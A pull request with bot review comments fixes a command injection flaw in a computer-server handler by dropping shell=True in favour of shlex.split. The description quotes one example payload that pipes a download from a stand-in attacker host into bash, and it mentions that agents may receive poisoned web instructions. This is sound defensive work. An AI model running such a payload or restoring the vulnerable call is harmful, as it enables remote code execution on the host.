fix: prevent command injection in GenericWindowHandler.launch()

[jnMetaCode]

Summary

GenericWindowHandler.launch() passes the app parameter directly to subprocess.Popen() with shell=True when no args are provided. This allows command injection if the app value comes from an untrusted source (e.g. agent instructions from web content).

Before:

proc = subprocess.Popen(app, shell=True)

After:

proc = subprocess.Popen(shlex.split(app))

shlex.split() safely tokenizes shell-like strings (e.g. "libreoffice --writer" → ["libreoffice", "--writer"]) without invoking a shell, so commands like "; curl attacker.com | bash" are no longer interpreted.

Related issue

Fixes #1097

Changes

• Added import shlex to generic.py
• Replaced subprocess.Popen(app, shell=True) with subprocess.Popen(shlex.split(app))

Summary by CodeRabbit

Bug Fixes

• Improved command execution handling to strengthen system reliability, stability, and security posture across multiple operational environments.
• Enhanced robustness ensures more consistent and predictable behavior in diverse deployment and usage scenarios.
• All existing functionality and user-facing features remain completely unchanged; zero impact on current workflows or commands.

[vercel]

@jnMetaCode is attempting to deploy a commit to the Cua Team on Vercel.

A member of the Team first needs to authorize it.

[coderabbitai]

Important

Review skipped

Auto incremental reviews are disabled on this repository.

Please check the settings in the CodeRabbit UI or the .coderabbit.yaml file in this repository. To trigger a single review, invoke the @coderabbitai review command.

⚙️ Run configuration

Configuration used: Organization UI

Review profile: CHILL

Plan: Pro

Run ID: 1dd793ca-cf94-423f-be2b-72a039393001

You can disable this status message by setting the reviews.review_status to false in the CodeRabbit configuration file.

Use the checkbox below for a quick retry:

• 🔍 Trigger review

📝 Walkthrough

Walkthrough

A command injection vulnerability in GenericWindowHandler.launch() is fixed by replacing shell=True with shlex.split() for safe command parsing, preventing arbitrary shell command execution when the app parameter is untrusted.

Changes

Cohort / File(s)	Summary
Security Fix libs/python/computer-server/computer_server/handlers/generic.py	Added shlex import and replaced subprocess.Popen(app, shell=True) with subprocess.Popen(shlex.split(app)) to prevent OS command injection (CWE-78). No behavior change for argument-passing path.

Estimated code review effort

🎯 1 (Trivial) | ⏱️ ~3 minutes

Poem

🐰 A rabbit hops through code so tight,
With shlex.split, commands are right,
No shell injection tricks shall pass,
Security's our hopping glass! ✨

🚥 Pre-merge checks | ✅ 4 | ❌ 1

❌ Failed checks (1 warning)

Check name	Status	Explanation	Resolution
Docstring Coverage	⚠️ Warning	Docstring coverage is 0.00% which is insufficient. The required threshold is 80.00%.	Write docstrings for the functions missing them to satisfy the coverage threshold.

✅ Passed checks (4 passed)

Check name	Status	Explanation
Description Check	✅ Passed	Check skipped - CodeRabbit’s high-level summary is enabled.
Title check	✅ Passed	The title 'fix: prevent command injection in GenericWindowHandler.launch()' is clear, specific, and accurately summarizes the main change - addressing a security vulnerability by eliminating shell=True usage.
Linked Issues check	✅ Passed	The PR successfully implements all coding requirements from issue #1097: imports shlex, replaces subprocess.Popen(app, shell=True) with shlex.split(app), and prevents command injection vulnerability.
Out of Scope Changes check	✅ Passed	All changes are in-scope: importing shlex and modifying the launch method in generic.py directly address the command injection vulnerability specified in #1097 without introducing unrelated changes.

_{✏️ Tip: You can configure your own custom pre-merge checks in the settings.}

✨ Finishing Touches

🧪 Generate unit tests (beta)

• Create PR with unit tests
• Post copyable unit tests in a comment

---

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

• X
• Mastodon
• Reddit
• LinkedIn

_{Comment @coderabbitai help to get the list of available commands and usage tips.}

[coderabbitai]

Actionable comments posted: 1

🤖 Prompt for all review comments with AI agents

Verify each finding against the current code and only fix it if needed.

Inline comments:
In `@libs/python/computer-server/computer_server/handlers/generic.py`:
- Around line 116-117: The current launch in generic.py uses shlex.split(app)
which forces POSIX tokenization and breaks Windows paths; modify the subprocess
invocation in the handler so it chooses parsing by platform: on Windows (e.g.,
sys.platform.startswith("win") or os.name == "nt") call subprocess.Popen(app)
with the string (no shell=True) so CreateProcess handles Windows
quoting/backslashes, and on POSIX use subprocess.Popen(shlex.split(app)) to
safely tokenize; keep the intent to avoid shell=True to prevent command
injection and update the code paths around proc/subprocess.Popen accordingly.

---

ℹ️ Review info

⚙️ Run configuration

Configuration used: Organization UI

Review profile: CHILL

Plan: Pro

Run ID: 3fe9a057-0bc6-40ad-9fe7-dda2b79e5b5d

📥 Commits

Reviewing files that changed from the base of the PR and between 65f9701 and 41e9186.

📒 Files selected for processing (1)

• libs/python/computer-server/computer_server/handlers/generic.py